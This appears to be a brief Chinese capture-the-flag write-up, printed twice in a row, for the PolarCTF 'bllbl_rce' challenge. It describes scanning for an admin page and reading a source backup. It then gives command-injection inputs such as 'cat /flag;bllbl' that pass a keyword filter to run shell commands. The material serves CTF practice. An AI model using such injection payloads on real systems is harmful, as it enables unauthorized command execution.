polar bllbl_rce
发现尝试输入什么都会返回 no
目录扫描一下 这边用的御剑
发现了http://b03cb505-b6b0-4441-afa9-3394da78554d.www.polarctf.com:8090/admin/admin.php
访问后下载源码备份 查看源码
if (strpos($command, ‘bllbl’) === false)
这里发现我们输入的命令里 要有 bllbl 字符
那可以输入命令了 ls /;bllbl
cat /flag;bllbl
polar bllbl_rce
发现尝试输入什么都会返回 no
目录扫描一下 这边用的御剑
发现了http://b03cb505-b6b0-4441-afa9-3394da78554d.www.polarctf.com:8090/admin/admin.php
访问后下载源码备份 查看源码
if (strpos($command, ‘bllbl’) === false)
这里发现我们输入的命令里 要有 bllbl 字符
那可以输入命令了 ls /;bllbl
cat /flag;bllbl